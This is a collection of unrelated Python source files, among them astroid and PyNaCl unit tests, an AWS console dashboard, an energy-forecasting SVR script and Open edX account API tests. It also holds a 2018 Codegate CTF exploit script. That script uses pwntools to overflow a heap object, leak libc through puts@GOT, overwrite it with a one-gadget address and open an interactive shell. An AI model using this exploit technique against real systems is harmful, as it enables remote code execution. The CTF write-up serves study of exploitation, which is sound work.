arju88nair/projectCulminate | venv/lib/python3.5/site-packages/astroid/tests/unittest_helpers.py | Python | apache-2.0 | 9,201 | 0.000109 | # Copyright (c) 2015-2016 Cara Vinson <ceridwenv@gmail.com>
# Copyright (c) 2015-2016 Claudiu Popa <pcmanticore@gmail.com>
# Licensed under the LGPL: https://www.gnu.org/licenses/old-licenses/lgpl-2.1.en.html
# For details: https://github.com/PyCQA/astroid/blob/master/COPYING.LESSER
import unittest
import six
from six.moves import builtins
from astroid import builder
from astroid import exceptions
from astroid import helpers
from astroid import manager
from astroid import raw_building
from astroid import test_utils
from astroid import util
class TestHelpers(unittest.TestCase):
def setUp(self):
builtins_name = builtins.__name__
astroid_manager = manager.AstroidManager()
self.builtins = astroid_manager.astroid_cache[builtins_name]
self.manager = manager.AstroidManager()
def _extract(self, obj_name):
return self.builtins.getattr(obj_name)[0]
def _build_custom_builtin(self, obj_name):
proxy = raw_building.build_class(obj_name)
proxy.parent = self.builtins
return proxy
def assert_classes_equal(self, cls, other):
self.assertEqual(cls.name, other.name)
self.assertEqual(cls.parent, other.parent)
self.assertEqual(cls.qname(), other.qname())
def test_object_type(self):
pairs = [
('1', self._extract('int')),
('[]', self._extract('list')),
('{1, 2, 3}', self._extract('set')),
('{1:2, 4:3}', self._extract('dict')),
('type', self._extract('type')),
('object', self._extract('type')),
('object()', self._extract('object')),
('lambda: None', self._build_custom_builtin('function')),
('len', self._build_custom_builtin('builtin_function_or_method')),
('None', self._build_custom_builtin('NoneType')),
('import sys\nsys#@', self._build_custom_builtin('module')),
]
for code, expected in pairs:
node = builder.extract_node(code)
objtype = helpers.object_type(node)
self.assert_classes_equal(objtype, expected)
def test_object_type_classes_and_functions(self):
ast_nodes = builder.extract_node('''
def generator():
yield
class A(object):
def test(self):
self #@
@classmethod
def cls_method(cls): pass
@staticmethod
def static_method(): pass
A #@
A() #@
A.test #@
A().test #@
A.cls_method #@
A().cls_method #@
A.static_method #@
A().static_method #@
generator() #@
''')
from_self = helpers.object_type(ast_nodes[0])
cls = next(ast_nodes[1].infer())
self.assert_classes_equal(from_self, cls)
cls_type = helpers.object_type(ast_nodes[1])
self.assert_classes_equal(cls_type, self._extract('type'))
instance_type = helpers.object_type(ast_nodes[2])
cls = next(ast_nodes[2].infer())._proxied
self.assert_classes_equal(instance_type, cls)
expected_method_types = [
(ast_nodes[3], 'instancemethod' if six.PY2 else 'function'),
(ast_nodes[4], 'instancemethod' if six.PY2 else 'method'),
            (ast_nodes[5], 'instancemethod' if six.PY2 else 'method'),
(ast_nodes[6], 'instancemethod' if six.PY2 else 'method'),
(ast_nodes[7], 'function'),
(ast_nodes[8], 'function'),
(ast_nodes[9], 'generator'),
]
for node, expected in expected_method_types:
            node_type = helpers.object_type(node)
expected_type = self._build_custom_builtin(expected)
self.assert_classes_equal(node_type, expected_type)
@test_utils.require_version(minver='3.0')
def test_object_type_metaclasses(self):
module = builder.parse('''
import abc
class Meta(metaclass=abc.ABCMeta):
pass
meta_instance = Meta()
''')
meta_type = helpers.object_type(module['Meta'])
self.assert_classes_equal(meta_type, module['Meta'].metaclass())
meta_instance = next(module['meta_instance'].infer())
instance_type = helpers.object_type(meta_instance)
self.assert_classes_equal(instance_type, module['Meta'])
@test_utils.require_version(minver='3.0')
def test_object_type_most_derived(self):
node = builder.extract_node('''
class A(type):
def __new__(*args, **kwargs):
return type.__new__(*args, **kwargs)
class B(object): pass
class C(object, metaclass=A): pass
# The most derived metaclass of D is A rather than type.
class D(B , C): #@
pass
''')
metaclass = node.metaclass()
self.assertEqual(metaclass.name, 'A')
obj_type = helpers.object_type(node)
self.assertEqual(metaclass, obj_type)
def test_inference_errors(self):
node = builder.extract_node('''
from unknown import Unknown
u = Unknown #@
''')
self.assertEqual(helpers.object_type(node), util.Uninferable)
def test_object_type_too_many_types(self):
node = builder.extract_node('''
from unknown import Unknown
def test(x):
if x:
return lambda: None
else:
return 1
test(Unknown) #@
''')
self.assertEqual(helpers.object_type(node), util.Uninferable)
def test_is_subtype(self):
ast_nodes = builder.extract_node('''
class int_subclass(int):
pass
class A(object): pass #@
class B(A): pass #@
class C(A): pass #@
int_subclass() #@
''')
cls_a = ast_nodes[0]
cls_b = ast_nodes[1]
cls_c = ast_nodes[2]
int_subclass = ast_nodes[3]
int_subclass = helpers.object_type(next(int_subclass.infer()))
base_int = self._extract('int')
self.assertTrue(helpers.is_subtype(int_subclass, base_int))
self.assertTrue(helpers.is_supertype(base_int, int_subclass))
self.assertTrue(helpers.is_supertype(cls_a, cls_b))
self.assertTrue(helpers.is_supertype(cls_a, cls_c))
self.assertTrue(helpers.is_subtype(cls_b, cls_a))
self.assertTrue(helpers.is_subtype(cls_c, cls_a))
self.assertFalse(helpers.is_subtype(cls_a, cls_b))
self.assertFalse(helpers.is_subtype(cls_a, cls_b))
@test_utils.require_version(maxver='3.0')
def test_is_subtype_supertype_old_style_classes(self):
cls_a, cls_b = builder.extract_node('''
class A: #@
pass
class B(A): #@
pass
''')
self.assertFalse(helpers.is_subtype(cls_a, cls_b))
self.assertFalse(helpers.is_subtype(cls_b, cls_a))
self.assertFalse(helpers.is_supertype(cls_a, cls_b))
self.assertFalse(helpers.is_supertype(cls_b, cls_a))
def test_is_subtype_supertype_mro_error(self):
cls_e, cls_f = builder.extract_node('''
class A(object): pass
class B(A): pass
class C(A): pass
class D(B, C): pass
class E(C, B): pass #@
class F(D, E): pass #@
''')
self.assertFalse(helpers.is_subtype(cls_e, cls_f))
self.assertFalse(helpers.is_subtype(cls_e, cls_f))
with self.assertRaises(exceptions._NonDeducibleTypeHierarchy):
helpers.is_subtype(cls_f, cls_e)
self.assertFalse(helpers.is_supertype(cls_f, cls_e))
def test_is_subtype_supertype_unknown_bases(self):
cls_a, cls_b = builder.extract_node('''
from unknown import Unknown
class A(Unknown): pass #@
class B(A): pass #@
''')
with self.assertRaises(exceptions._NonDeducibleTypeHierarchy):
helpers.is_subtype(cls_a, cls_b)
with self.assertRaises(exceptions._NonDeducibleTypeHierarchy):
helpers.is_supertype(cls_a, cls_b)
def test_is_subtype_supertype_unrelated_classes(self):
cls_a, cls_b = builder.extract_node('''
class A(object): pas |
jtpaasch/artifact | artifact/stats/console.py | Python | mit | 13,192 | 0 | # -*- coding: utf-8 -*-
"""A module for displaying stats in the console."""
import sys
import time
import curses
from curses import wrapper
from artifact.stats import autoscalinggroups
from artifact.stats import ec2
from artifact.stats import elasticloadbalancers
from artifact.stats import launchconfigurations
from artifact.stats import securitygroups
from artifact.stats import subnets
from artifact.stats import vpcs
def paint_box(stdscr, width, start_y, start_x, heading, fieldsets):
"""Paint a number of (text) fields in a box on the screen."""
indent = 2
padding = width - (len(heading) + 1)
full_heading = " " + heading
if padding > 0:
for x in range(padding):
full_heading += " "
stdscr.addstr(start_y, start_x, full_heading, curses.A_REVERSE)
start_y += 1
for i, fieldset in enumerate(fieldsets):
start_y += 1
for line, field in enumerate(fieldset):
if line == 0:
stdscr.addstr(
start_y,
start_x,
"- " + str(field),
curses.A_BOLD)
else:
stdscr.addstr(
start_y,
start_x + indent,
str(field))
start_y += 1
def show_vpcs(stdscr):
"""Fetch and paint stats about VCPs."""
data = vpcs.get_vpcs()
width = 20
start_y = 0
start_x = 0
heading = "VPCs"
fieldsets = []
for i, datum in enumerate(data):
vpc_id = datum.get("VpcId")
cidr_block = datum.get("CidrBlock")
status = datum.get("State")
default = "Default VPC" if datum.get("IsDefault") else ""
vpc_name = "<Unnamed>"
if datum.get("Tags"):
tags = datum.get("Tags")
for tag in tags:
if tag.get("Key") == "Name":
vpc_name = tag.get("Value")
fieldsets.append([
vpc_name,
vpc_id,
cidr_block,
status,
default,
])
paint_box(stdscr, width, start_y, start_x, heading, fieldsets)
def show_subnets(stdscr):
"""Fetch and paint stats about subnets."""
data = subnets.get_subnets()
width = 20
start_y = 0
start_x = 25
heading = "Subnets"
fieldsets = []
for datum in data:
fieldset = []
subnet_id = datum.get("SubnetId")
vpc_id = datum.get("VpcId")
cidr_block = datum.get("CidrBlock")
availability_zone = datum.get("AvailabilityZone")
subnet_name = "<Unnamed>"
if datum.get("Tags"):
tags = datum.get("Tags")
for tag in tags:
if tag.get("Key") == "Name":
subnet_name = tag.get("Value")
fieldset.append(subnet_name)
fieldset.append(subnet_id)
fieldset.append(vpc_id)
fieldset.append(cidr_block)
fieldset.append(availability_zone)
fieldsets.append(fieldset)
paint_box(stdscr, width, start_y, start_x, heading, fieldsets)
def show_auto_scaling_groups(stdscr):
"""Fetch and paint stats about auto scaling groups."""
data = autoscalinggroups.get_auto_scaling_groups()
width = 20
start_y = 0
start_x = 50
heading = "Auto Scale Groups"
fieldsets = []
for datum in data:
fieldset = []
group_name = datum.get("AutoScalingGroupName")
launch_config = datum.get("LaunchConfigurationName")
min_size = datum.get("MinSize")
max_size = datum.get("MaxSize")
desired_size = datum.get("DesiredCapacity")
availability_zones = datum.get("AvailabilityZones")
elastic_load_balancers = datum.get("LoadBalancerNames")
instances = []
instance_list = datum.get("Instances")
if instance_list:
for instance in instance_list:
instance_id = instance.get("InstanceId")
instance_zone = instance.get("AvailabilityZone")
instance_status = instance.get("LifecycleState")
instance_health = instance.get("HealthStatus")
instances.append(instance_id)
instances.append(instance_zone)
instances.append(instance_status)
instances.append(instance_health)
fieldset.append(group_name)
if launch_config:
fieldset.append(launch_config)
size = str(min_size) + " " + str(max_size) + " " + str(desired_size)
fieldset.append(size)
if availability_zones:
fieldset += availability_zones
if elastic_load_balancers:
fieldset += elastic_load_balancers
if instances:
fieldset += instances
fieldsets.append(fieldset)
paint_box(stdscr, width, start_y, start_x, heading, fieldsets)
def show_ec2_instances(stdscr):
"""Fetch and paint stats about EC2 instances."""
data = ec2.get_instances()
width = 20
start_y = 0
start_x = 75
heading = "Instances"
fieldsets = []
for i, datum in enumerate(data):
fieldset = []
instance_id = datum.get("InstanceId")
status = datum.get("State").get("Name")
if status == "terminated":
continue
private_dnsname = datum.get("PrivateDnsName")
public_dnsname = datum.get("PublicDnsName")
instance_type = datum.get("InstanceType")
subnet_id = datum.get("SubnetId")
vpc_id = datum.get("VpcId")
private_ip = datum.get("PrivateIpAddress")
public_ip = datum.get("PublicIpAddress")
instance_name = "<Unna | med>"
if datum.get("Tags"):
tags = datum.get("Tags")
for tag in tags:
if tag.get("Key") == "Name":
instance_name = tag.get("Value")
security_groups = []
if datum.get("SecurityGroups"):
sgs = datum.get("SecurityGroups")
for sg in sgs:
group_name = sg.get("GroupName")
group_id = sg.get("GroupId")
                security_groups.append(group_name + " " + group_id)
fieldset.append(instance_name)
fieldset.append(instance_id)
fieldset.append(instance_type)
fieldset.append(status)
if private_dnsname:
fieldset.append(private_dnsname)
if private_ip:
fieldset.append(private_ip)
if public_dnsname:
fieldset.append(public_dnsname)
if public_ip:
fieldset.append(public_ip)
fieldset.append(vpc_id)
fieldset.append(subnet_id)
if security_groups:
fieldset.append(", ".join(security_groups))
fieldsets.append(fieldset)
paint_box(stdscr, width, start_y, start_x, heading, fieldsets)
def show_elastic_load_balancers(stdscr):
"""Fetch and paint stats about elastic load balancers."""
data = elasticloadbalancers.get_elastic_load_balancers()
width = 35
start_y = 28
start_x = 25
heading = "Elastic Load Balancers"
fieldsets = []
for i, datum in enumerate(data):
fieldset = []
elb_name = datum.get("LoadBalancerName")
dns_name = datum.get("DNSName")
if datum.get("ListenerDescriptions"):
listeners = datum.get("ListenerDescriptions")
protocols = []
ports = []
instance_protocols = []
instance_ports = []
ssl_cert_ids = []
if listeners:
for listener in listeners:
protocol = listener.get("Protocol")
protocols.append(str(protocol))
port = listener.get("LoadBalancerPort")
ports.append(str(port))
instance_protocol = listener.get("InstanceProtocol")
instance_protocols.append(str(instance_protocol))
instance_port = listener.get("InstancePort")
instance_ports.append(str(instance_port))
ssl_cert_id = listener.get("SSLCertificateId")
ssl_cert_ids.append(str(ssl_cert_id))
instances = []
|
scwuaptx/CTF | 2018-writeup/codegate/marimo.py | Python | gpl-2.0 | 1,472 | 0.011549 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
import time
host = "10.211.55.6"
port = 8888
host = "ch41l3ng3s.codegate.kr"
port = 3333
r = remote(host,port)
def sell(idx):
r.recvuntil(">>")
r.sendline("S")
r.recvuntil(">>")
r.sendline(str(idx))
r.recvuntil("?")
r.sendline("S")
def buy(size,name,pr):
r.recvuntil(">>")
r.sendline("B")
r.recvuntil(">>")
r.sendline(str(size))
r.recvuntil(">>")
r.sendline("P")
r.recvuntil(">>")
r.sendline(name)
r.recvuntil(">>")
r.sendline(pr)
def view(idx,profile=None):
r.recvuntil(">>") |
r.sendline("V")
r.recvuntil(">>")
r.sendline(str(idx))
data = r.recvuntil(">>")
if profile :
r.sendline("M")
r.recvuntil(">>")
r.sendline(profile)
return data
else :
r.sendline("B")
return data
puts_got = 0x603018
r.recvuntil(">>")
r.sendline("show me the marimo")
r.recvuntil(">>")
r.sendline("Aa")
r.recvuntil(">>")
r.sendline("orange")
time.sleep(1)
sell(0)
buy(1,"d | anogg","fuck")
buy(1,"orange","fuck")
time.sleep(3)
data = view(0)
ctime = int(data.split("current time :")[1].split("\n")[0].strip())
view(0,"a"*0x30 + p32(ctime) + p32(1) + p64(puts_got) + p64(puts_got))
r.recvuntil(">>")
r.sendline("B")
data = view(1)
libc = u64(data.split("name :")[1].split("\n")[0].strip().ljust(8,"\x00")) - 0x6f690
print hex(libc)
magic = libc + 0x45216
view(1,p64(magic))
r.interactive()
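# Editor's note (addition): rough flow of the exploit above, as far as it can
# be read from the script itself. sell() frees the marimo chunk, the two buy()
# calls reclaim it, and view(0, ...) overflows the profile to rewrite the
# object's pointers to puts@GOT (0x603018), so view(1) leaks a libc address.
# The constants 0x6f690 and 0x45216 look like a puts offset and a one-shot
# execve gadget for the target's libc (taken from the script, not
# independently verified).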
|
dtulyakov/py | intuit/test2.py | Python | gpl-2.0 | 255 | 0.038835 | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
import os, sys
try:
s = "qwertyu"
while s != "":
print s
s = s[1:-1]
#    print "Just nonsense"
except:
    print "A problem occurred while running the program!"
|
xueyumusic/pynacl | tests/test_box.py | Python | apache-2.0 | 7,660 | 0 | # Copyright 2013 Donald Stufft and individual contributors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, division, print_function
import binascii
import pytest
from nacl.encoding import HexEncoder
from nacl.exceptions import CryptoError
from nacl.public import Box, PrivateKey, PublicKey
VECTORS = [
# privalice, pubalice, privbob, pubbob, nonce, plaintext, ciphertext
(
b"77076d0a7318a57d3c16c17251b26645df4c2f87ebc0992ab177fba51db92c2a",
b"8520f0098930a754748b7ddcb43ef75a0dbf3a0d26381af4eba4a98eaa9b4e6a",
b"5dab087e624a8a4b79e17f8b83800ee66f3bb1292618b6fd1c2f8b27ff88e0eb",
b"de9edb7d7b7dc1b4d35b61c2ece435373f8343c85b78674dadfc7e146f882b4f",
b"69696ee955b62b73cd62bda875fc73d68219e0036b7a0b37",
(b"be075fc53c81f2d5cf141316ebeb0c7b5228c52a4c62cbd44b66849b64244ffce5e"
b"cbaaf33bd751a1ac728d45e6c61296cdc3c01233561f41db66cce314adb310e3be8"
b"250c46f06dceea3a7fa1348057e2f6556ad6b1318a024a838f21af1fde048977eb4"
b"8f59ffd4924ca1c60902e52f0a089bc76897040e082f937763848645e0705"),
(b"f3ffc7703f9400e52a7dfb4b3d3305d98e993b9f48681273c29650ba32fc76ce483"
b"32ea7164d96a4476fb8c531a1186ac0dfc17c98dce87b4da7f011ec48c97271d2c2"
b"0f9b928fe2270d6fb863d51738b48eeee314a7cc8ab932164548e526ae902243685"
b"17acfeabd6bb3732bc0e9da99832b61ca01b6de56244a9e88d5f9b37973f622a43d"
b"14a6599b1f654cb45a74e355a5"),
),
]
def test_generate_private_key():
PrivateKey.generate()
def test_box_creation():
pub = PublicKey(
b"ec2bee2d5be613ca82e377c96a0bf2220d823ce980cdff6279473edc52862798",
encoder=HexEncoder,
)
priv = PrivateKey(
b"5c2bee2d5be613ca82e377c96a0bf2220d823ce980cdff6279473edc52862798",
encoder=HexEncoder,
)
Box(priv, pub)
def test_box_decode():
pub = PublicKey(
b"ec2bee2d5be613ca82e377c96a0bf2220d823ce980cdff6279473edc52862798",
encoder=HexEncoder,
)
priv = PrivateKey(
b"5c2bee2d5be613ca82e377c96a0bf2220d823ce980cdff6279473edc52862798",
encoder=HexEncoder,
)
b1 = Box(priv, pub)
b2 = Box.decode(b1._shared_key)
assert b1._shared_key == b2._shared_key
def test_box_bytes():
pub = PublicKey(
b"ec2bee2d5be613ca82e377c96a0bf2220d823ce980cdff6279473edc52862798",
encoder=HexEncoder,
)
priv = PrivateKey(
b"5c2bee2d5be613ca82e377c96a0bf2220d823ce980cdff6279473edc52862798",
encoder=HexEncoder,
)
b = Box(priv, pub)
assert bytes(b) == b._shared_key
@pytest.mark.parametrize(
(
"privalice", "pubalice", "privbob", | "pubbob", "nonce", "plaintext",
"ciphertext",
),
VECTORS,
)
def test_box_encryption(
privalice, pubalice, privbob, pubbob, nonce, plaintext, ciphertext):
pubalice = PublicKey(pubalice, encoder=HexEncoder)
privbob = PrivateKey(privbob, encoder=HexEncoder)
box = Box(privbob, pubalice)
encrypted = box.encrypt(
binascii.unhexlify(plaintext),
binascii.unhexlify(nonce),
encoder=HexEncoder,
)
expected = binascii.hexlify(
binascii.unhexlify(nonce) + binascii.unhexlify(ciphertext),
)
assert encrypted == expected
assert encrypted.nonce == nonce
assert encrypted.ciphertext == ciphertext
@pytest.mark.parametrize(
(
"privalice", "pubalice", "privbob", "pubbob", "nonce", "plaintext",
"ciphertext",
),
VECTORS,
)
def test_box_decryption(
privalice, pubalice, privbob, pubbob, nonce, plaintext, ciphertext):
pubbob = PublicKey(pubbob, encoder=HexEncoder)
privalice = PrivateKey(privalice, encoder=HexEncoder)
box = Box(privalice, pubbob)
nonce = binascii.unhexlify(nonce)
decrypted = binascii.hexlify(
box.decrypt(ciphertext, nonce, encoder=HexEncoder),
)
assert decrypted == plaintext
@pytest.mark.parametrize(
(
"privalice", "pubalice", "privbob", "pubbob", "nonce", "plaintext",
"ciphertext",
),
VECTORS,
)
def test_box_decryption_combined(
privalice, pubalice, privbob, pubbob, nonce, plaintext, ciphertext):
pubbob = PublicKey(pubbob, encoder=HexEncoder)
privalice = PrivateKey(privalice, encoder=HexEncoder)
box = Box(privalice, pubbob)
combined = binascii.hexlify(
binascii.unhexlify(nonce) + binascii.unhexlify(ciphertext),
)
decrypted = binascii.hexlify(box.decrypt(combined, encoder=HexEncoder))
assert decrypted == plaintext
@pytest.mark.parametrize(
(
"privalice", "pubalice", "privbob", "pubbob", "nonce", "plaintext",
"ciphertext",
),
VECTORS,
)
def test_box_failed_decryption(
privalice, pubalice, privbob, pubbob, nonce, plaintext, ciphertext):
pubbob = PublicKey(pubbob, encoder=HexEncoder)
privbob = PrivateKey(privbob, encoder=HexEncoder)
# this cannot decrypt the ciphertext! the ciphertext must be decrypted by
# (privalice, pubbob) or (privbob, pubalice)
box = Box(privbob, pubbob)
with pytest.raises(CryptoError):
box.decrypt(ciphertext, binascii.unhexlify(nonce), encoder=HexEncoder)
def test_box_wrong_length():
with pytest.raises(ValueError):
PublicKey(b"")
with pytest.raises(ValueError):
PrivateKey(b"")
pub = PublicKey(
b"ec2bee2d5be613ca82e377c96a0bf2220d823ce980cdff6279473edc52862798",
encoder=HexEncoder,
)
priv = PrivateKey(
b"5c2bee2d5be613ca82e377c96a0bf2220d823ce980cdff6279473edc52862798",
encoder=HexEncoder,
)
b = Box(priv, pub)
with pytest.raises(ValueError):
b.encrypt(b"", b"")
with pytest.raises(ValueError):
b.decrypt(b"", b"")
def check_type_error(expected, f, *args):
with pytest.raises(TypeError) as e:
f(*args)
assert expected in str(e)
def test_wrong_types():
priv = PrivateKey.generate()
check_type_error("PrivateKey must be created from a 32 byte seed",
PrivateKey, 12)
check_type_error("PrivateKey must be created from a 32 byte seed",
PrivateKey, priv)
check_type_error("PrivateKey must be created from a 32 byte seed",
PrivateKey, priv.public_key)
check_type_error("PublicKey must be created from 32 bytes",
PublicKey, 13)
check_type_error("PublicKey must be created from 32 bytes",
PublicKey, priv)
check_type_error("PublicKey must be created from 32 bytes",
PublicKey, priv.public_key)
check_type_error("Box must be created from a PrivateKey and a PublicKey",
Box, priv, "not a public key")
check_type_error("Box must be created from a PrivateKey and a PublicKey",
Box, priv.encode(), priv.public_key.encode())
check_type_error("Box must be created from a PrivateKey and a PublicKey",
Box, priv, priv.public_key.encode())
check_type_error("Box must be created from a PrivateKey and a PublicKey",
Box, priv.encode(), priv.public_key)
|
pulsar-chem/Pulsar-Core | lib/systems/l-glutamic_acid.py | Python | bsd-3-clause | 1,099 | 0.00091 | import pulsar as psr
def load_ref_system():
""" Returns l-glutamic_acid as found in the IQMol fragment library.
All credit to https://github.com/nutjunkie/IQmol
"""
return psr.make_system("""
N 0.1209 -2.2995 -0.2021
C 0.4083 -0.9510 -0.7668
C -0.0197 0.1567 0.2036
H 0.2953 -0.0889 1.2387
              H          0.5152      1.0936     -0.0551
C -1.5226 0.3991 0.1502
H -1.8462 0.6291 -0.8851
H -2.0847 -0.5077 0.4535
C -1.8924 1.5597 1.0413
O -1.8774 2.7496 0.7858
O -2.3012 1.2232 2.2867
H -2.5017 2.0069 2.7891
C 1.9123 -0.8901 -1.0205
O 2.3094 -1.5372 -2.1437
O 2.7925 -0.3483 -0.3817
H 0.2282 -2.9904 -0.9133
H -0.8129 -2.3188 0.1500
H -0.1109 -0.7851 -1.7497
H 3.2561 -1.4867 -2.2319
""")
|
msfrank/Higgins | higgins/upnp/logger.py | Python | lgpl-2.1 | 296 | 0.006757 | # Higgins - A multi-media server
# Copyright (c) 2007-2009 Michael Frank <msfrank@syntaxjockey.com>
#
# This program is free software; for license information see
# the COPYING file.
from higgins.logger import Loggable
class UPnPLogger(Loggable):
log_domain = "upnp"
logger = UPnPLogger()
|
uwkejia/Clean-Energy-Outlook | examples/Extra/Codes/SVR_nuclear.py | Python | mit | 1,586 | 0.019546 | import pandas as pd
from sklearn import preprocessing, cross_validation
from sklearn.svm import SVR

def read_data(file_name):
return pd.read_csv(file_name)
def preprocess(data):
# Data Preprocessing
data['GDP_scaled']=preprocessing.scale(data['GDP'])
data['CLPRB_scaled']=preprocessing.scale(data['CLPRB'])
data['EMFDB_scaled']=preprocessing.scale(data['EMFDB'])
data['ENPRP_scaled']=preprocessing.scale(data['ENPRP'])
    data['NGMPB_scaled']=preprocessing.scale(data['NGMPB'])
data['PAPRB_scaled']=preprocessing.scale(data['PAPRB'])
data['PCP_scaled']=preprocessing.scale(data['PCP'])
data['ZNDX_scaled']=preprocessing.scale(data['ZNDX'])
    data['OP_scaled']=preprocessing.scale(data['Nominal Price'])
data['OP2_scaled']=preprocessing.scale(data['Inflation Adjusted Price'])
return data
def split_data(data):
# Split data for train and test
all_x = data[['GDP_scaled','CLPRB_scaled','EMFDB_scaled','ENPRP_scaled','NGMPB_scaled','PAPRB_scaled','PCP_scaled','ZNDX_scaled','OP_scaled', 'OP2_scaled']][:55]
all_y = data[['NUETP']][:55]
return cross_validation.train_test_split(all_x, all_y, test_size=0.2, random_state=0)
# SVR for nuclear
def SVR_predict(X_train, X_test, y_train, y_test):
clf = SVR(kernel='sigmoid', C=90.0, epsilon=0.3).fit(X_train, y_train)
print(clf.score(X_test, y_test))
future_x = data[['GDP_scaled','CLPRB_scaled','EMFDB_scaled','ENPRP_scaled','NGMPB_scaled','PAPRB_scaled','PCP_scaled','ZNDX_scaled','OP_scaled','OP2_scaled']][-6:]
pred = pd.DataFrame(clf.predict(future_x))
pred.columns = [statelist[i]]
result = pd.concat([result, pred], axis=1)
return result
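# Editor's sketch (addition): how the helpers above chain together. The CSV
# path is a hypothetical placeholder; SVR_predict additionally expects
# module-level `data`, `statelist` and `result` objects that are defined
# elsewhere in the original project.
if __name__ == '__main__':
    data = read_data('nuclear.csv')  # hypothetical input file
    data = preprocess(data)
    X_train, X_test, y_train, y_test = split_data(data)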
|
cpennington/edx-platform | openedx/core/djangoapps/user_api/accounts/tests/test_api.py | Python | agpl-3.0 | 25,510 | 0.003652 | # -*- coding: utf-8 -*-
"""
Unit tests for behavior that is specific to the api methods (vs. the view methods).
Most of the functionality is covered in test_views.py.
"""
import itertools
import unicodedata
import ddt
from django.conf import settings
from django.contrib.auth.hashers import make_password
from django.contrib.auth.models import User
from django.http import HttpResponse
from django.test import TestCase
from django.test.client import RequestFactory
from django.urls import reverse
from mock import Mock, patch
from six import iteritems
from social_django.models import UserSocialAuth
from student.models import (
AccountRecovery,
PendingEmailChange,
PendingSecondaryEmailChange,
UserProfile
)
from student.tests.factories import UserFactory
from student.tests.tests import UserSettingsEventTestMixin
from student.views.management import activate_secondary_email
from openedx.core.djangoapps.ace_common.tests.mixins import EmailTemplateTagMixin
from openedx.core.djangoapps.user_api.accounts import PRIVATE_VISIBILITY
from openedx.core.djangoapps.user_api.accounts.api import (
get_account_settings,
update_account_settings
)
from openedx.core.djangoapps.user_api.accounts.tests.retirement_helpers import ( # pylint: disable=unused-import
RetirementTestCase,
fake_requested_retirement,
setup_retirement_states
)
from openedx.core.djangoapps.user_api.errors import (
AccountUpdateError,
AccountValidationError,
UserNotAuthorized,
UserNotFound
)
from openedx.core.djangolib.testing.utils import skip_unless_lms
from openedx.features.enterprise_support.tests.factories import EnterpriseCustomerUserFactory
def mock_render_to_string(template_name, context):
"""Return a string that encodes template_name and context"""
return str((template_name, sorted(iteritems(context))))
def mock_render_to_response(template_name):
"""
Return an HttpResponse with content that encodes template_name and context
"""
# This simulates any db access in the templates.
UserProfile.objects.exists()
return HttpResponse(template_name)
class CreateAccountMixin(object):
def create_account(self, username, password, email):
# pylint: disable=missing-docstring
registration_url = reverse('user_api_registration')
resp = self.client.post(registration_url, {
'username': username,
'email': email,
'password': password,
'name': username,
'honor_code': 'true',
})
self.assertEqual(resp.status_code, 200)
@skip_unless_lms
@ddt.ddt
@patch('student.views.management.render_to_response', Mock(side_effect=mock_render_to_response, autospec=True))
class TestAccountApi(UserSettingsEventTestMixin, EmailTemplateTagMixin, CreateAccountMixin, RetirementTestCase):
"""
These tests specifically cover the parts of the API methods that are not covered by test_views.py.
This includes the specific types of error raised, and default behavior when optional arguments
are not specified.
"""
password = "test"
def setUp(self):
super(TestAccountApi, self).setUp()
self.request_factory = RequestFactory()
self.table = "student_languageproficiency"
self.user = UserFactory.create(password=self.password)
self.default_request = self.request_factory.get("/api/user/v1/accounts/")
self.default_request.user = self.user
self.different_user = UserFactory.create(password=self.password)
self.staff_user = UserFactory(is_staff=True, password=self.password)
self.reset_tracker()
enterprise_patcher = patch('openedx.features.enterprise_support.api.enterprise_customer_for_request')
enterprise_learner_patcher = enterprise_patcher.start()
enterprise_learner_patcher.return_value = {}
self.addCleanup(enterprise_learner_patcher.stop)
def test_get_username_provided(self):
"""Test the difference in behavior when a username is supplied to get_account_settings."""
account_settings = get_account_settings(self.default_request)[0]
self.assertEqual(self.user.username, account_settings["username"])
account_settings = get_account_settings(self.default_request, usernames=[self.user.username])[0]
self.assertEqual(self.user.username, account_settings["username"])
account_settings = get_account_settings(self.default_request, usernames=[self.different_user.username])[0]
self.assertEqual(self.different_user.username, account_settings["username"])
def test_get_configuration_provided(self):
"""Test the difference in behavior when a configuration is supplied to get_account_settings."""
config = {
"default_visibility": "private",
"public_fields": [
'email', 'name',
],
}
# With default configuration settings, email is not shared with other (non-staff) users.
account_settings = get_account_settings(self.default_request, [self.different_user.username])[0]
self.assertNotIn("email", account_settings)
account_settings = get_account_settings(
self.default_request,
[self.different_user.username],
configuration=config,
)[0]
self.assertEqual(self.different_user.email, account_settings["email"])
def test_get_user_not_found(self):
"""Test that UserNotFound is thrown if there is no user with username."""
with self.assertRaises(UserNotFound):
get_account_settings(self.default_request, usernames=["does_not_exist"])
self.user.username = "does_not_exist"
request = self.request_factory.get("/api/user/v1/accounts/")
request.user = self.user
with self.assertRaises(UserNotFound):
get_account_settings(request)
def test_update_username_provided(self):
"""Test the difference in behavior when a username is supplied to update_account_settings."""
update_account_settings(self.user, {"name": "Mickey Mouse"})
account_settings = get_account_settings(self.default_request)[0]
self.assertEqual("Mickey Mouse", account_settings["name"])
update_account_settings(self.user, {"name": "Donald Duck"}, username=self.user.username)
account_settings = get_account_settings(self.default_request)[0]
self.assertEqual("Donald Duck", account_settings["name"])
with self.assertRaises(UserNotAuthorized):
            update_account_settings(self.different_user, {"name": "Pluto"}, username=self.user.username)
def test_update_non_existent_user(self):
with self.assertRaises(UserNotAuthorized):
            update_account_settings(self.user, {}, username="does_not_exist")
self.user.username = "does_not_exist"
with self.assertRaises(UserNotFound):
update_account_settings(self.user, {})
def test_get_empty_social_links(self):
account_settings = get_account_settings(self.default_request)[0]
self.assertEqual(account_settings['social_links'], [])
def test_set_single_social_link(self):
social_links = [
dict(platform="facebook", social_link="https://www.facebook.com/{}".format(self.user.username))
]
update_account_settings(self.user, {"social_links": social_links})
account_settings = get_account_settings(self.default_request)[0]
self.assertEqual(account_settings['social_links'], social_links)
def test_set_multiple_social_links(self):
social_links = [
dict(platform="facebook", social_link="https://www.facebook.com/{}".format(self.user.username)),
dict(platform="twitter", social_link="https://www.twitter.com/{}".format(self.user.username)),
]
update_account_settings(self.user, {"social_links": social_links})
